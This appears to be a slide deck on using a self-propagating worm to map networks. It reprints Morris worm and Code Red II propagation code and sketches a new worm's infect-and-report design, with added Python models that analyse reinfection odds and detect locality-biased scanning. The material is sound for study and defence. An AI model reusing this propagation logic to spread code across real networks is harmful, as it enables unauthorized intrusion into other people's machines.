Post on 20-Dec-2015

The Worm Works For You

Matt Weaver

CS591

Introduction

The Shockwave Rider

PARC

Town Crier

Vampire

Goal

Use a worm to measure bandwidth and map a network.

Analyze classic worms: Morris, Code Red.

Determine the algorithm and architecture of a “useful worm”

Morris Mistake

Listen on a port: failure leads to infection.

Machines were reinfected.

Morris checkother()

checkother() /* 0x57d0 */
{
    int s, l8, l12, l16, optval;
    struct sockaddr_in sin;        /* 16 bytes */

    optval = 1;
    if ((random() % 7) == 3)
        return;                    /* 612 */
    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0)
        return;

    /* Make a socket to the localhost, using a link-time specific port */
    bzero(&sin, sizeof(sin));      /* 16 */
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = inet_addr(XS("127.0.0.1"));  /* <other_fd+4> */
    sin.sin_port = 0x00005b3d;     /* ??? */

    if (connect(s, &sin, sizeof(sin)) < 0) {
        close(s);
    } else {
        l8 = MAGIC_2;              /* Magic number??? */
        if (write(s, &l8, sizeof(l8)) != sizeof(l8)) {
            close(s);
            return;
        }
        l8 = 0;
        if (xread(s, &l8, sizeof(l8), 5*60) != sizeof(l8)) {
            close(s);
            return;
        }
        if (l8 != MAGIC_1) {
            close(s);
            return;
        }
        l12 = random()/8;
        if (write(s, &l12, sizeof(l12)) != sizeof(l12)) {
            close(s);
            return;
        }
        if (xread(s, &l16, sizeof(l16), 10) != sizeof(l16)) {
            close(s);
            return;
        }
        if (!((l12+l16) % 2))
            pleasequit++;
        close(s);
    }

    sleep(5);
    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0)
        return;
    /* Set the socket so that the address may be reused */
    setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &optval, sizeof(optval));
    if (bind(s, &sin, sizeof(sin)) < 0) {
        close(s);
        return;
    }
    listen(s, 10);
    other_fd = s;
    return;
}
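The reinfection problem in checkother() comes down to two decisions in the code above: one arriving copy in seven never runs the check at all (`random() % 7 == 3`), and when the check does run, the newcomer only sets `pleasequit` when the two exchanged values sum to an even number, which is a fair coin flip. The following model is an added example written for these slides; it is not code from the deck or from the worm. It assumes (as a simplification) that a copy which sets `pleasequit` exits immediately; in the real worm the exit was delayed, so the real accumulation was worse than this model shows.

```python
"""Why checkother() lets a host be reinfected: a model of the slide's logic.

Added example, not code from the slides or from the Morris worm itself.  It
keeps only the two decisions that matter for reinfection on an already
infected host:
  1. `if ((random() % 7) == 3) return;`   one newcomer in seven skips the check;
  2. `if (!((l12+l16) % 2)) pleasequit++;` otherwise the newcomer quits only
     when the exchanged values sum to an even number (a fair coin flip).
Assumption: a newcomer that sets pleasequit exits at once (the real worm did
not, so this model is optimistic).
"""
import random
from fractions import Fraction

SKIP_MODULUS = 7   # random() % 7
SKIP_VALUE = 3     # ... == 3 means the check is skipped


def newcomer_survives(check_draw: int, l12: int, l16: int) -> bool:
    """Mirror the slide's control flow for one arriving copy on a host that
    already runs the worm.  check_draw is random() % 7; l12 is the newcomer's
    random()/8; l16 is the value read back from the resident copy."""
    if check_draw == SKIP_VALUE:       # check skipped: no connect, no pleasequit
        return True
    if (l12 + l16) % 2 == 0:           # even sum: pleasequit++ -> newcomer dies
        return False
    return True                        # odd sum: newcomer keeps running


def survival_probability() -> Fraction:
    """Exact probability that a newcomer survives, from the two constants."""
    p_skip = Fraction(1, SKIP_MODULUS)
    p_odd = Fraction(1, 2)             # parity of the sum of two random values
    return p_skip + (1 - p_skip) * p_odd   # 1/7 + 6/7 * 1/2 = 4/7


def simulate_reinfections(attempts: int, seed: int = 0) -> int:
    """Count the extra copies that accumulate on one host after `attempts`
    reinfection attempts, each decided by newcomer_survives()."""
    rng = random.Random(seed)
    copies = 0
    for _ in range(attempts):
        check_draw = rng.randrange(SKIP_MODULUS)
        l12 = rng.getrandbits(31) // 8         # random()/8 on a 31-bit random()
        l16 = rng.getrandbits(31) // 8
        if newcomer_survives(check_draw, l12, l16):
            copies += 1
    return copies


if __name__ == "__main__":
    p = survival_probability()
    print(f"P(newcomer survives) = {p} ~ {float(p):.3f}")
    n = 7000
    print(f"after {n} reinfection attempts: {simulate_reinfections(n)} surviving "
          f"copies (expected about {int(n * p)})")
```

The point for a defender is the number 4/7: a self-check that lets more than half of the arriving copies through is not a check against reinfection at all, and a host under repeated infection attempts accumulates processes roughly linearly with the attempt count. Any "am I already here" test that depends on a localhost listener answering also fails open, which is what the slide means by "failure leads to infection".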

Code Red II

Mountain Dew

Code Red utilized a clever distribution scheme: not just the random IP trick.

Code Red II (Continued)

mtable[] = {
    0xFFFFFFFF,   // go anywhere
    0xFFFFFF00,   // stay in class A
    0xFFFFFF00,   // stay in class A
    0xFFFFFF00,   // stay in class A
    0xFFFFFF00,   // stay in class A
    0xFFFF0000,   // stay in class B
    0xFFFF0000,   // stay in class B
    0xFFFF0000    // stay in class B
};

# start with a random number that will be our new IP address.
# I presume the random number generator is "random enough".
newip = random();

# zero the UPPER octets of the random IP, which means that the
# random number won't participate in the class A or class B
# address
mask = mtable[ random() & 0x7 ];   // locate a mask
newip &= mask;                     // throw away rightmost bits

# flip the mask around to operate on LOWER octets
mask = ~mask;                      // flip the mask around
myip = LOCAL_IP & mask;            // throw away leftmost bits

# newip contains the upper bits
# myip contains the lower bits
# join them:
newip |= myip;

if (newip starts with 127) try again   // localhost
if (newip starts with 224) try again   // multicast
if (newip matches LOCAL_IP) try again

Connect to "newip" and try to infect
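What the mask table buys the worm is locality: one pick in eight goes anywhere, four of eight stay in the local class A, three of eight stay in the local class B. The example below is added for these slides and is not code from the deck or from the worm. It works in dotted-quad terms from the comments on the table ("go anywhere", "stay in class A", "stay in class B") rather than from the hex masks, which the slide gives in the byte order the worm used internally; it computes the expected split from the table, applies the three "try again" rules, and measures the same split over destinations seen from one host, which is the property a network sensor can look for. All addresses in it are constructed.

```python
"""Locality of Code Red II target selection, and a per-host check for it.

Added example, not code from the slides or from the worm.  Driven by the
labels on the slide's mtable[] entries, not by the hex mask values, which are
in the worm's internal byte order.  All IP addresses here are constructed.
"""
from collections import Counter
from ipaddress import IPv4Address
from typing import Dict, Iterable

# One entry per slot of mtable[], as the slide's comments label them.
MTABLE_LABELS = ("anywhere",
                 "classA", "classA", "classA", "classA",
                 "classB", "classB", "classB")
CATEGORIES = ("anywhere", "classA", "classB")


def expected_locality() -> Dict[str, float]:
    """Share of targets per category when one of the eight slots is picked
    uniformly (random() & 0x7 selects the slot)."""
    counts = Counter(MTABLE_LABELS)
    return {c: counts[c] / len(MTABLE_LABELS) for c in CATEGORIES}


def is_rejected(newip: str, local_ip: str) -> bool:
    """The three 'try again' rules on the slide: 127.x (localhost), 224.x
    (multicast, as the slide states it), and the scanning host's own address."""
    first_octet = int(IPv4Address(newip)) >> 24
    return first_octet in (127, 224) or newip == local_ip


def locality(local_ip: str, dest: str) -> str:
    """Classify dest by the prefix it shares with local_ip: first two octets
    ('classB'), first octet only ('classA'), or neither ('anywhere').  A
    class-A pick that also matches the second octet lands in classB here;
    that is the 1-in-256 case and does not change the picture."""
    l, d = int(IPv4Address(local_ip)), int(IPv4Address(dest))
    if (l >> 16) == (d >> 16):
        return "classB"
    if (l >> 24) == (d >> 24):
        return "classA"
    return "anywhere"


def observed_locality(local_ip: str, dests: Iterable[str]) -> Dict[str, float]:
    """The same breakdown, measured over destinations seen from one host."""
    dests = list(dests)
    counts = Counter(locality(local_ip, d) for d in dests)
    return {c: counts[c] / len(dests) for c in CATEGORIES}


def prefix_biased(local_ip: str, dests: Iterable[str],
                  min_attempts: int = 50, threshold: float = 0.6) -> bool:
    """Defender-side heuristic: a host with many outbound connection attempts,
    most of them inside its own /8, matches the profile of the table above.
    min_attempts and threshold are tuning knobs to fit to the local network."""
    dests = list(dests)
    if len(dests) < min_attempts:
        return False
    local_share = 1.0 - observed_locality(local_ip, dests)["anywhere"]
    return local_share >= threshold


# Constructed sample: eight destinations seen from 10.1.2.3, chosen so the
# split matches the table exactly (3 in the /16, 4 more in the /8, 1 elsewhere).
LOCAL_IP = "10.1.2.3"
SAMPLE_DESTS = ["10.1.0.7", "10.1.44.200", "10.1.250.1",
                "10.9.9.9", "10.77.1.1", "10.128.0.5", "10.200.3.3",
                "198.51.100.4"]

if __name__ == "__main__":
    print("expected from mtable:", expected_locality())
    print("observed in sample:  ", observed_locality(LOCAL_IP, SAMPLE_DESTS))
    print("biased toward own /8 over 56 attempts:",
          prefix_biased(LOCAL_IP, SAMPLE_DESTS * 7))
```

The locality bias cuts both ways: it is why the worm spreads quickly once it is inside a network that has many hosts in one /8 or /16, and it is also why the scan pattern of an infected host is distinguishable from the random-IP trick the slide contrasts it with, since a large share of its connection attempts stay inside prefixes the local sensor already knows.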

A New Worm

(Diagram: Root, Target, Target, Target, Target, Network)

Logic

Write a text file (C on Win ~ on Unix)

Talk to parent. Find next machine. Infect next. Talk to parent. Timed death. Forced death (success).

(Diagram: Parent, Child, Next Target)

Concerns

Running amok/re-infection.

Termination

The Root Machine

Compiles UDP payload information from child instances.

Maps the network.

Dynamically generates the viral payload (binary).

Provides control values.

Conclusion

Master’s Project: get it working safely.

Sources

Aleph One. “Smashing the Stack for Fun and Profit”. Phrack 49.

CERT. http://www.cert.org/

Eren, Sinan. “Smashing the Kernel Stack for Fun and Profit.” Phrack 60.

Erickson, Jon. Hacking: The Art of Exploitation. No Starch Press, 2003.

Morris, Robert. Morris Worm Source Code. http://www.foo.be/docs-free/morris-worm/worm/

Wikipedia, “Computer Worm”. http://en.wikipedia.org/wiki/Computer_worm

Friedl, Steve. Unix Wiz. http://www.unixwiz.net/
